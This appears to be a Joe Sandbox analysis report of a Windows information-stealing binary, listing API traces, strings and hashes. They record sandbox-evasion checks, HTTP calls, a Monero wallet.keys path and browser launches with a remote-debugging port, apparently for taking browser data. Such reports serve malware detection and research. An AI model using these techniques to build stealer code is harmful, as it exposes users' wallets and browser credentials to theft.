                                      control_flow_graph 1450 126d93 1451 126daa 1450->1451 1453 126d5a-126d77 call 12ade0 OpenEventA 1451->1453 1454 126dac-126dc2 call 126bc0 call 125d60 CloseHandle ExitProcess 1451->1454 1460 126d95-126da4 CloseHandle Sleep 1453->1460 1461 126d79-126d91 call 12ade0 CreateEventA 1453->1461 1460->1451 1461->1454
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00126D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00126D99
                                      • Sleep.KERNEL32(00001770), ref: 00126DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126DBA
                                      • ExitProcess.KERNEL32 ref: 00126DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 979be8a05360e8bed210ddf0c5939455942dd51b84f68533858eb421368dc7ed
                                      • Instruction ID: 78a943bd40ea49563551a627629e5e0ee592757ebc3040fe99312fca5796d2e4
                                      • Opcode Fuzzy Hash: 979be8a05360e8bed210ddf0c5939455942dd51b84f68533858eb421368dc7ed
                                      • Instruction Fuzzy Hash: 26F08230A4832DEFEB25BBE0FC4ABBD3378AF14701F500615F612A91D1CBB05910CA61

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 0c5f85c44cfc03d94eeca8f47c598b1c9e99eba593743c5f8ab41c5f168363c9
                                      • Instruction ID: 4bc1b2ab170b7e781d29f3f67685fd71888c0c1bd0b3946c33e006f5b515a75f
                                      • Opcode Fuzzy Hash: 0c5f85c44cfc03d94eeca8f47c598b1c9e99eba593743c5f8ab41c5f168363c9
                                      • Instruction Fuzzy Hash: 1A211FB1D00209ABDF14DFA4E845ADE7B79FF45320F508625FA15A72D0EB706A09CF91

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 001162D0: InternetOpenA.WININET(00130DFF,00000001,00000000,00000000,00000000), ref: 00116331
                                        • Part of subcall function 001162D0: StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116353
                                        • Part of subcall function 001162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00116385
                                        • Part of subcall function 001162D0: HttpOpenRequestA.WININET(00000000,GET,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 001163D5
                                        • Part of subcall function 001162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0011640F
                                        • Part of subcall function 001162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00116421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 321e12012d3eaa08d6d483c7ec729d33022c332b5849d93071d52f3777b09251
                                      • Instruction ID: 764dfb3c4ad204e3ee79459eb2889605b18cf48ad98144ef4df2a7119f4da1ae
                                      • Opcode Fuzzy Hash: 321e12012d3eaa08d6d483c7ec729d33022c332b5849d93071d52f3777b09251
                                      • Instruction Fuzzy Hash: 09111230900118ABCB18FFA4FD92AED7339AF60340FC04568F91A5B492FF30AB64CA51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00127ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: 73e8d32eca05306df82b2158438b6d0bc5a40b74d1dac2674a3e73c000107b09
                                      • Instruction ID: e9f8f390fb2a03cb2637169c9be9ec0c51b3577bdb5557654a2d246e79f0c637
                                      • Opcode Fuzzy Hash: 73e8d32eca05306df82b2158438b6d0bc5a40b74d1dac2674a3e73c000107b09
                                      • Instruction Fuzzy Hash: 8B0186B1908259ABC714CF98ED85BAFBBBCF704721F100619F605E72C0D7755A0087A1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0011112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00111132
                                      • ExitProcess.KERNEL32 ref: 00111143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 31b46cd4412b74e3f2a17f46850582db69faaea7516855198975b5fc9d8aff62
                                      • Instruction ID: e8776c582e2edaad820a97d8d19b4e64e5a9090fdaf04b49d60a205a78e7e532
                                      • Opcode Fuzzy Hash: 31b46cd4412b74e3f2a17f46850582db69faaea7516855198975b5fc9d8aff62
                                      • Instruction Fuzzy Hash: 85E08670D89308FBE7259BA09C0AB4CB66C9B04B01F100254F7087A1D0C7B425404658
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001110B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001110F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 14d63916fd1cfc00aa3761a85ede7288a752e4610845e4e355ef1d4cddc2f73c
                                      • Instruction ID: 94c6ae647b86cb7afe2123f2dcd97a3332c89bfb4247cd374eeb9d4696069440
                                      • Opcode Fuzzy Hash: 14d63916fd1cfc00aa3761a85ede7288a752e4610845e4e355ef1d4cddc2f73c
                                      • Instruction Fuzzy Hash: 83F08971641314BBE71496A4AC59FAEB79CE705705F300558F604E7280D6719E409664
                                      APIs
                                        • Part of subcall function 00127A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127AA0
                                        • Part of subcall function 00127A70: RtlAllocateHeap.NTDLL(00000000), ref: 00127AA7
                                        • Part of subcall function 00127A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00127ABF
                                        • Part of subcall function 001279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001111B7), ref: 00127A10
                                        • Part of subcall function 001279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00127A17
                                        • Part of subcall function 001279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00127A2F
                                      • ExitProcess.KERNEL32 ref: 001111C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: 234e5cb3d2e84596aeba5174ca59564ffdc8701238381847b76995d16668ac01
                                      • Instruction ID: 82dca535f780e33845713de54f10dfdef5866ab12d881b938795988f4c9a2bd1
                                      • Opcode Fuzzy Hash: 234e5cb3d2e84596aeba5174ca59564ffdc8701238381847b76995d16668ac01
                                      • Instruction Fuzzy Hash: 7FE017B590831167CA2873B4BC47B6BB28C5B2435EF040928FA0996182EF25EC618265
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00130B32,00130B2F,00000000,?,?,?,00131450,00130B2E), ref: 0011BEC5
                                      • StrCmpCA.SHLWAPI(?,00131454), ref: 0011BF33
                                      • StrCmpCA.SHLWAPI(?,00131458), ref: 0011BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 0011C8BB
                                      Strings
                                      • Preferences, xrefs: 0011C104
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0011C3B2
                                      • \Brave\Preferences, xrefs: 0011C1C1
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0011C534
                                      • Brave, xrefs: 0011C0E8
                                      • Google Chrome, xrefs: 0011C6F8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0011C495
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 71ecc36276c7495d5fb6e63aba50f17432c75cb2d84c12dbc53c3349eab782a0
                                      • Instruction ID: ae67fb9deb51074ee3e587d4d77ce9443c9ceaad4888be93a9045fa4363a0512
                                      • Opcode Fuzzy Hash: 71ecc36276c7495d5fb6e63aba50f17432c75cb2d84c12dbc53c3349eab782a0
                                      • Instruction Fuzzy Hash: AC52F6729101189BCB24FB60ED96EEE737DAF64300F8045A9F50A67191EF346B58CF62
                                      APIs
                                      • wsprintfA.USER32 ref: 00123B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00123B33
                                      • lstrcat.KERNEL32(?,?), ref: 00123B85
                                      • StrCmpCA.SHLWAPI(?,00130F58), ref: 00123B97
                                      • StrCmpCA.SHLWAPI(?,00130F5C), ref: 00123BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00123EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00123ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: 8099aa7b8ef29176a15945bab207f2fea80679e4d1bda5f01473d76d4f5a1a0f
                                      • Instruction ID: ad38a3b56786d8321a52f45906e2c07f5345487afaa90635dcb275b1e093803f
                                      • Opcode Fuzzy Hash: 8099aa7b8ef29176a15945bab207f2fea80679e4d1bda5f01473d76d4f5a1a0f
                                      • Instruction Fuzzy Hash: 12A14F71A00258ABDB35DFA4DC85FEA737DAF58300F044688F61D9A181EB749B98CF61
                                      APIs
                                      • wsprintfA.USER32 ref: 00124B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                      • StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                      • StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00124DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 0650bfef83513bc287f03e35a53c8bae5b42c948c7775d6493f1cdf4b2109c3c
                                      • Instruction ID: b63d9bb074b1083bc6c4c27b40d7c2ce192f837fabc7e78ca01cc04ee5c0503c
                                      • Opcode Fuzzy Hash: 0650bfef83513bc287f03e35a53c8bae5b42c948c7775d6493f1cdf4b2109c3c
                                      • Instruction Fuzzy Hash: 4F615971900258ABCB35EBA0EC95FEA737CBF58700F404698F60D96191EB70AB95CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001247D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001247D7
                                      • wsprintfA.USER32 ref: 001247F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0012480D
                                      • StrCmpCA.SHLWAPI(?,00130FAC), ref: 0012483B
                                      • StrCmpCA.SHLWAPI(?,00130FB0), ref: 00124851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001248DB
                                      • FindClose.KERNEL32(000000FF), ref: 001248F0
                                      • lstrcat.KERNEL32(?,00E3F910), ref: 00124915
                                      • lstrcat.KERNEL32(?,00E3E4E0), ref: 00124928
                                      • lstrlen.KERNEL32(?), ref: 00124935
                                      • lstrlen.KERNEL32(?), ref: 00124946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*$
                                      • API String ID: 671575355-1403936960
                                      • Opcode ID: aca2e09226a40921ee090616516b58ad923be7310fb6b1de5d86b08c80beca99
                                      • Instruction ID: 42ad677c5500471d9661cb87e666119e8d14cdba71f2990ca16f90a249121a18
                                      • Opcode Fuzzy Hash: aca2e09226a40921ee090616516b58ad923be7310fb6b1de5d86b08c80beca99
                                      • Instruction Fuzzy Hash: 295178B1904218ABCB75EB70EC99FED737CAB58300F404698F64996190EB74DB94CF91
                                      APIs
                                      • wsprintfA.USER32 ref: 00124113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0012412A
                                      • StrCmpCA.SHLWAPI(?,00130F94), ref: 00124158
                                      • StrCmpCA.SHLWAPI(?,00130F98), ref: 0012416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001242BC
                                      • FindClose.KERNEL32(000000FF), ref: 001242D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: c9d9a43936c26fd675dc368fab95647df8955c8d6685853877808056b8277702
                                      • Instruction ID: 56cd664de63fd7897cab5048bb6e8c92dc3cf91a69f799c8f49f735b3cacc0fb
                                      • Opcode Fuzzy Hash: c9d9a43936c26fd675dc368fab95647df8955c8d6685853877808056b8277702
                                      • Instruction Fuzzy Hash: C95147B1904218ABCB35EBB0ED95EEA737CBF58300F4046DCB64996090EB75AB95CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: (BW?$*Y;$1|_]$1^$2#g{$3=}7$3<{$]7_$oem$p"z$r[?x$uNe{$w}e}$?~
                                      • API String ID: 0-419826266
                                      • Opcode ID: d5667729f125944b8dcfda5503626f6454591e2de428fdcc843cf63bfacba57c
                                      • Instruction ID: e54616d047d4e85265669439ea21f7324fb1a8967aab913f1d515e88181b1323
                                      • Opcode Fuzzy Hash: d5667729f125944b8dcfda5503626f6454591e2de428fdcc843cf63bfacba57c
                                      • Instruction Fuzzy Hash: F4B217F3A0C2109FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E67558058693
                                      APIs
                                      • wsprintfA.USER32 ref: 0011EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0011EE55
                                      • StrCmpCA.SHLWAPI(?,00131630), ref: 0011EEAB
                                      • StrCmpCA.SHLWAPI(?,00131634), ref: 0011EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 0011F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
